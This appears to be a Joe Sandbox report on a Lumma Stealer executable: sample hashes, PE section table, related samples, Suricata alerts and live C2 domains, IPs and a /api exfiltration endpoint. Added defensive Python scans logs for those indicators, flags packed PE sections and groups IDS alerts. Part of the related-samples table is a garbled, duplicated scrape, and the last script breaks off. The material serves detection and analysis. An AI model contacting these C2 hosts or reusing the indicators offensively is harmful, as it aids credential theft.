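window and threshold below are assumptions chosen for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Indicators copied from the report's contacted-domain, IP and URL tables.
C2_DOMAINS = {
    "mindhandru.buzz", "scentniej.buzz", "rebuildeso.buzz", "appliacnesot.buzz",
    "screwamusresz.buzz", "cashfuzysao.buzz", "inherineau.buzz",
    "prisonyfork.buzz", "hummskitnj.buzz",
}
C2_IPS = {"172.67.165.185", "104.21.11.101"}
C2_PATH = "/api"  # the report lists https://mindhandru.buzz/api

# Assumed line format (constructed for this example, not a real log source):
#   <ISO timestamp> <type> <host> <value>
# type "dns":   value = queried name
# type "proxy": value = "<src_ip> <METHOD> <url>"
SAMPLE_LOG = """\
2024-12-27T07:41:10Z dns WS-0042 scentniej.buzz
2024-12-27T07:41:11Z dns WS-0042 rebuildeso.buzz
2024-12-27T07:41:12Z dns WS-0042 appliacnesot.buzz
2024-12-27T07:41:13Z dns WS-0042 mindhandru.buzz
2024-12-27T07:41:14Z proxy WS-0042 10.0.0.42 POST https://mindhandru.buzz/api
2024-12-27T07:41:15Z dns WS-0042 s-part-0035.t-0009.t-msedge.net
2024-12-27T09:15:00Z dns WS-0007 cashfuzysao.buzz
2024-12-27T09:20:00Z proxy WS-0007 10.0.0.7 GET https://www.ecosia.org/newtab/
"""

FAILOVER_WINDOW = timedelta(seconds=60)  # assumed tuning values
FAILOVER_MIN_DOMAINS = 3


def parse_line(line):
    """Split one log line into its timestamp, type, host and remaining value."""
    ts, kind, host, rest = line.split(" ", 3)
    return {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "kind": kind, "host": host, "value": rest}


def scan(log_text):
    """Return a list of (host, reason) findings for the given log text."""
    findings = []
    dns_hits = defaultdict(list)  # host -> [(timestamp, listed domain)]
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        if ev["kind"] == "dns":
            name = ev["value"].lower().rstrip(".")
            if name in C2_DOMAINS:
                dns_hits[ev["host"]].append((ev["ts"], name))
                findings.append((ev["host"], f"dns query for listed C2 domain {name}"))
        elif ev["kind"] == "proxy":
            _src, method, url = ev["value"].split(" ", 2)
            u = urlparse(url)
            dest = (u.hostname or "").lower()
            if dest in C2_DOMAINS or dest in C2_IPS:
                reason = f"{method} to listed C2 {dest}{u.path}"
                if u.path == C2_PATH and method == "POST":
                    reason += " (matches the report's /api endpoint)"
                findings.append((ev["host"], reason))
    # Failover pattern: one host querying several listed domains in quick succession.
    for host, hits in dns_hits.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            window = {d for t, d in hits[i:] if t - t0 <= FAILOVER_WINDOW}
            if len(window) >= FAILOVER_MIN_DOMAINS:
                findings.append((host, f"{len(window)} listed domains queried within "
                                       f"{FAILOVER_WINDOW.seconds}s (LummaC-style failover)"))
                break
    return findings


if __name__ == "__main__":
    for host, reason in scan(SAMPLE_LOG):
        print(f"{host}: {reason}")
```

On the constructed log, WS-0042 produces four domain hits, one POST to the /api endpoint and the failover finding, while WS-0007 produces only the single cashfuzysao.buzz query and no failover alert; the msedge.net and ecosia.org lines are not flagged. The per-domain matches are exact-name matches, so a real deployment should also consider subdomains and the case where the malware reaches the IP without a DNS lookup, which the proxy check covers only when the destination is one of the two listed addresses.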
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581216
Start date and time: 2024-12-27 08:40:55 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: zi042476Iv.exe (renamed because the original name is a hash value)
Original Sample Name: e5c73b43bd01bb3580af440576a00ad3.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212, 4.245.163.56
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target zi042476Iv.exe, PID 6492, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:41:49 | API Interceptor | 8x Sleep call for process: zi042476Iv.exe modified
Related samples by contacted IP

Each entry lists the associated sample name or URL, the detection and the threat name from the linked report; the SHA 256 and report links are not reproduced here.

172.67.165.185
• U7TAniYFeK.exe: malicious, LummaC
• ZBbOXn0a3R.exe: malicious, LummaC, Amadey, LummaC Stealer, Stealc
• P0SJULJxI0.exe: malicious, LummaC
• r06aMlvVyM.exe: malicious, LummaC
• i8Vwc7iOaG.exe: malicious, LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar
• XM6cn2uNux.exe: malicious, LummaC
• rwFNJ4pHWG.exe: malicious, LummaC
• dEugughckk.exe: malicious, LummaC
• Solara-v3.0.exe: malicious, LummaC
• https://click.jipolismall.de/i86/: malicious, Unknown

104.21.11.101
• C8FtVPhuxd.exe: malicious, LummaC
• 0zBsv1tnt4.exe: malicious, LummaC
• cqHMm0ykDG.exe: malicious, LummaC
• b0ho5YYSdo.exe: malicious, LummaC
• ZX2M0AXZ56.exe: malicious, LummaC
• 0Pm0sadcCP.exe: malicious, LummaC, Amadey, LummaC Stealer, Stealc
• TTsfmr1RWm.exe: malicious, LummaC
• COBYmpzi7q.exe: malicious, LummaC
• lBsKTx65QC.exe: malicious, LummaC
• https://out.novastellz.de/i45/: malicious, Unknown

Related samples by contacted domain

The IP in parentheses is the context column, i.e. the address the domain resolved to in that sample's analysis.

s-part-0035.t-0009.t-msedge.net
• 54861 Proforma Invoice AMC2273745.xlam.xlsx: malicious, Unknown (13.107.246.63)
• TAX INVOICE - NBO2506000632.xlam.xlsx: malicious, Unknown (13.107.246.63)
• installer.bat: malicious, Vidar (13.107.246.63)
• din.exe: malicious, Vidar (13.107.246.63)
• lem.exe: malicious, Vidar (13.107.246.63)
• atw3.dll: malicious, Gozi, Ursnif (13.107.246.63)
• WRD1792.docx.doc: malicious, Dynamer (13.107.246.63)
• 0zBsv1tnt4.exe: malicious, LummaC (13.107.246.63)
• pVbAZEFIpI.exe: malicious, LummaC (13.107.246.63)
• GxX48twWHA.exe: malicious, LummaC (13.107.246.63)

mindhandru.buzz
• C8FtVPhuxd.exe: malicious, LummaC (104.21.11.101)
• U7TAniYFeK.exe: malicious, LummaC (172.67.165.185)
• 0zBsv1tnt4.exe: malicious, LummaC (104.21.11.101)
                                                                                                                                  cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.11.101
                                                                                                                                  ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.11.101
                                                                                                                                  r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.11.101
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  CLOUDFLARENETUSC8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.11.101
                                                                                                                                  U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                  • 172.64.41.3
                                                                                                                                  6wFwugeLNG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.135.139
                                                                                                                                  9mauyKC3JW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 172.67.153.243
                                                                                                                                  uUtgy7BbF1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.71.155
                                                                                                                                  x4PaiRVIyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.175.134
                                                                                                                                  3vLKNycnrz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.62.151
                                                                                                                                  installer.batGet hashmaliciousVidarBrowse
                                                                                                                                  • 172.64.41.3
                                                                                                                                  skript.batGet hashmaliciousVidarBrowse
                                                                                                                                  • 162.159.61.3
                                                                                                                                  CLOUDFLARENETUSC8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.11.101
                                                                                                                                  U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                  • 172.64.41.3
                                                                                                                                  6wFwugeLNG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.135.139
                                                                                                                                  9mauyKC3JW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 172.67.153.243
                                                                                                                                  uUtgy7BbF1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.71.155
                                                                                                                                  x4PaiRVIyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.175.134
                                                                                                                                  3vLKNycnrz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.62.151
                                                                                                                                  installer.batGet hashmaliciousVidarBrowse
                                                                                                                                  • 172.64.41.3
                                                                                                                                  skript.batGet hashmaliciousVidarBrowse
                                                                                                                                  • 162.159.61.3
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1C8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  6wFwugeLNG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  9mauyKC3JW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  uUtgy7BbF1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  x4PaiRVIyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  3vLKNycnrz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  NewI Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.537625101613762
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: zi042476Iv.exe
File size: 2'941'952 bytes
MD5: e5c73b43bd01bb3580af440576a00ad3
SHA1: e77f4d19f5b74853fddf4e03f8e73d04a67eeef6
SHA256: 73530f53798c09139cbc44033cc2259de175bbc508819527137da458d0d4dd73
SHA512: 0928550d0987e20bd713d2f7f721f74264d79173e96a9eca3b785b442f9b8b129f478229d26e517887b2d3aab1163b289728013aa0af5903da142d7ac51eea53
SSDEEP: 49152:W6JbMKz/Ul2onavv6etVq1KZXcHTkvyONi5c9xRO7O:xoSUl2onavv6e7q1FTBci5c9xQ
TLSH: DDD54B92B80A72CFD89A27B49227CD46991D07B847240CD3FEAC75FA7E67DC112B5C24
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@.........................../.....z.-...@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x6fb000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [ecx], al
                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add dword ptr [edx], ecx
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
Name                               | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT       | 0x54059         | 0x6d         | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE     | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_EXCEPTION    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY     | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC    | 0x541f8         | 0x8          | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG        | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG  | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0           | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED     | 0x0             | 0x0          |
Name         | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type            | Entropy            | Characteristics
(empty name) | 0x1000          | 0x52000      | 0x26400  | 0b6cf7a75b7b9bc862e2e7569bd8adf1 | False    | 0.9996234170751634  | data                 | 7.98432450240108   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc        | 0x53000         | 0x1000       | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0                   | empty                | 0.0                | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata       | 0x54000         | 0x1000       | 0x200    | 39a711a7d804ccbc2a14eea65cf3c27e | False    | 0.154296875         | data                 | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wwzrppjr     | 0x55000         | 0x2a5000     | 0x2a4600 | 8b93293efcc0b3ed85d156687fade31d | unknown  | unknown             | unknown              | unknown            | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vmxrzajb     | 0x2fa000        | 0x1000       | 0x600    | fd558c738312657b37c75132e9f9b21f | False    | 0.5514322916666666  | data                 | 4.8852585514362366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant     | 0x2fb000        | 0x3000       | 0x2200   | 3ef8bca2f212cc9d7f3f0ce3d5603303 | False    | 0.06502757352941177 | DOS executable (COM) | 0.8089428919387718 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL          | Import
kernel32.dll | lstrcpy
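The section table above has the shape of a packed loader: an unnamed section that is readable, writable and executable at once, with entropy 7.98 (the ceiling for uniformly random bytes is 8.0) and a virtual size (0x52000) about twice its raw size (0x26400); two further executable sections with random-looking names (wwzrppjr, vmxrzajb); and an import table that resolves only kernel32.dll!lstrcpy, so any other API the stub uses must be located at run time. As an added example, not code from the Joe Sandbox report, the Python below parses a PE section table directly with struct, computes per-section Shannon entropy and applies the four checks an analyst would otherwise run by hand. The test file it builds is constructed to mirror that shape and is not the analysed binary; the 7.2 entropy threshold, the 2x virtual-to-raw ratio and the list of "known" section names are assumptions chosen for illustration.

```python
import math
import random
import struct
from collections import Counter

# Section characteristic flags (values from winnt.h).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Assumption: names a stock linker emits; anything else is worth a second look.
KNOWN_SECTION_NAMES = {b".text", b".data", b".rdata", b".rsrc", b".idata",
                       b".edata", b".reloc", b".bss", b".tls", b".pdata"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section headers."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    first_hdr = coff + 20 + opt_size      # section table follows the optional header
    sections = []
    for i in range(num_sections):
        (name, vsize, va, raw_size, raw_ptr, _reloc, _line, _nreloc, _nline,
         chars) = struct.unpack_from("<8sIIIIIIHHI", pe, first_hdr + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({"name": name.rstrip(b"\0"), "virtual_address": va,
                         "virtual_size": vsize, "raw_size": raw_size,
                         "characteristics": chars, "entropy": shannon_entropy(raw)})
    return sections


def triage(section: dict) -> list:
    """Packer / loader-stub indicators for one section (thresholds are assumptions)."""
    findings = []
    if section["name"] not in KNOWN_SECTION_NAMES:
        findings.append("unusual-section-name")
    chars = section["characteristics"]
    if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
        findings.append("writable-and-executable")
    if section["entropy"] > 7.2:
        findings.append("high-entropy")
    if section["virtual_size"] > 2 * section["raw_size"]:
        findings.append("virtual-size-exceeds-raw")   # room reserved for runtime unpacking
    return findings


def triage_file(pe: bytes) -> dict:
    return {s["name"]: triage(s) for s in parse_sections(pe)}


def build_sample_pe() -> bytes:
    """Constructed test file (not the analysed sample): a minimal PE32 image whose
    section table copies the report's shape: an unnamed RWX section of random
    bytes, an empty .rsrc, and an ordinary read-only .text."""
    rng = random.Random(20241227)
    rwx = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    sections = [  # (name, virtual size, characteristics, raw bytes)
        (b"", 0x52000, rwx, rng.randbytes(0x4000)),
        (b".rsrc", 0x1000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, b""),
        (b".text", 0x1000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ,
         b"\x55\x8b\xec\x33\xc0\x5d\xc3" * 585),   # push ebp; mov ebp,esp; xor eax,eax; pop ebp; ret
    ]
    headers = bytearray(0x200)                    # DOS + PE headers padded to file alignment
    headers[:2] = b"MZ"
    struct.pack_into("<I", headers, 0x3C, 0x40)   # e_lfanew
    headers[0x40:0x44] = b"PE\0\0"
    # COFF header: Machine=i386, NumberOfSections, no timestamp/symbols,
    # SizeOfOptionalHeader=0 (omitted in this constructed file; the parser reads the real value).
    struct.pack_into("<HHIIIHH", headers, 0x44, 0x014C, len(sections), 0, 0, 0, 0, 0x0102)
    body, va = bytearray(), 0x1000
    for i, (name, vsize, chars, raw) in enumerate(sections):
        raw_ptr = len(headers) + len(body) if raw else 0
        struct.pack_into("<8sIIIIIIHHI", headers, 0x58 + 40 * i,
                         name, vsize, va, len(raw), raw_ptr, 0, 0, 0, 0, chars)
        body += raw
        va += (vsize + 0xFFF) & ~0xFFF
    return bytes(headers + body)


if __name__ == "__main__":
    for sec in parse_sections(build_sample_pe()):
        print(f"{sec['name'].decode() or '<empty>':8} entropy={sec['entropy']:.2f} {triage(sec)}")
```

Run against a real file, `triage_file(open(path, "rb").read())` returns the same findings per section; on the sample in this report the unnamed section would trip all four checks and the two random-named sections at least the name check.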
Timestamp                       | SID     | Signature                                                                      | Severity | Source IP   | Source Port | Dest IP        | Dest Port | Protocol
2024-12-27T08:41:49.256104+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                      | 3        | 192.168.2.9 | 49712       | 172.67.165.185 | 443       | TCP
2024-12-27T08:41:49.994221+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity                                      | 1        | 192.168.2.9 | 49712       | 172.67.165.185 | 443       | TCP
2024-12-27T08:41:49.994221+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin                                      | 1        | 192.168.2.9 | 49712       | 172.67.165.185 | 443       | TCP
2024-12-27T08:41:51.309576+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                      | 3        | 192.168.2.9 | 49718       | 172.67.165.185 | 443       | TCP
2024-12-27T08:41:52.092267+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2                                   | 1        | 192.168.2.9 | 49718       | 172.67.165.185 | 443       | TCP
2024-12-27T08:41:52.092267+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin                                      | 1        | 192.168.2.9 | 49718       | 172.67.165.185 | 443       | TCP
2024-12-27T08:41:53.794022+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                      | 3        | 192.168.2.9 | 49724       | 172.67.165.185 | 443       | TCP
2024-12-27T08:41:56.056067+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                      | 3        | 192.168.2.9 | 49730       | 172.67.165.185 | 443       | TCP
2024-12-27T08:42:05.806654+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                      | 3        | 192.168.2.9 | 49752       | 172.67.165.185 | 443       | TCP
2024-12-27T08:42:08.405022+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                      | 3        | 192.168.2.9 | 49758       | 172.67.165.185 | 443       | TCP
2024-12-27T08:42:09.163141+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration                          | 1        | 192.168.2.9 | 49758       | 172.67.165.185 | 443       | TCP
2024-12-27T08:42:11.074170+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                      | 3        | 192.168.2.9 | 49763       | 104.21.11.101  | 443       | TCP
2024-12-27T08:42:11.079369+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration                          | 1        | 192.168.2.9 | 49763       | 104.21.11.101  | 443       | TCP
2024-12-27T08:42:11.079369+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1        | 192.168.2.9 | 49763       | 104.21.11.101  | 443       | TCP
2024-12-27T08:42:15.831457+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                      | 3        | 192.168.2.9 | 49776       | 104.21.11.101  | 443       | TCP
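Read per flow rather than per row, the alert table tells a clearer story: the JA3 rule (SID 2028371, severity 3) fires on every one of the eight TLS connections, because a JA3 rule matches the client's TLS fingerprint and not the traffic content, while the severity-1 ET MALWARE rules fire on only four of them (source ports 49712, 49718, 49758, 49763), the ones that carried a check-in or an exfiltration POST. The Python below is an added example, not part of the Joe Sandbox report: it parses the rows above (copied inline as pipe-separated text so it runs offline), groups them by 5-tuple, and marks a flow "escalate" only when a severity-1 malware signature accompanies the JA3 hit, "watch" when the fingerprint alone matched. The verdict names and the severity/keyword rules are assumptions for illustration.

```python
from collections import defaultdict
from datetime import datetime

# Rows from the Suricata alert table above, copied as pipe-separated text:
# timestamp | sid | signature | severity | src ip | src port | dst ip | dst port | proto
ALERTS = """\
2024-12-27T08:41:49.256104+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49712 | 172.67.165.185 | 443 | TCP
2024-12-27T08:41:49.994221+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.9 | 49712 | 172.67.165.185 | 443 | TCP
2024-12-27T08:41:49.994221+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49712 | 172.67.165.185 | 443 | TCP
2024-12-27T08:41:51.309576+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49718 | 172.67.165.185 | 443 | TCP
2024-12-27T08:41:52.092267+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.9 | 49718 | 172.67.165.185 | 443 | TCP
2024-12-27T08:41:52.092267+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49718 | 172.67.165.185 | 443 | TCP
2024-12-27T08:41:53.794022+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49724 | 172.67.165.185 | 443 | TCP
2024-12-27T08:41:56.056067+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49730 | 172.67.165.185 | 443 | TCP
2024-12-27T08:42:05.806654+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49752 | 172.67.165.185 | 443 | TCP
2024-12-27T08:42:08.405022+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49758 | 172.67.165.185 | 443 | TCP
2024-12-27T08:42:09.163141+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.9 | 49758 | 172.67.165.185 | 443 | TCP
2024-12-27T08:42:11.074170+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49763 | 104.21.11.101 | 443 | TCP
2024-12-27T08:42:11.079369+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.9 | 49763 | 104.21.11.101 | 443 | TCP
2024-12-27T08:42:11.079369+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.9 | 49763 | 104.21.11.101 | 443 | TCP
2024-12-27T08:42:15.831457+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49776 | 104.21.11.101 | 443 | TCP
"""


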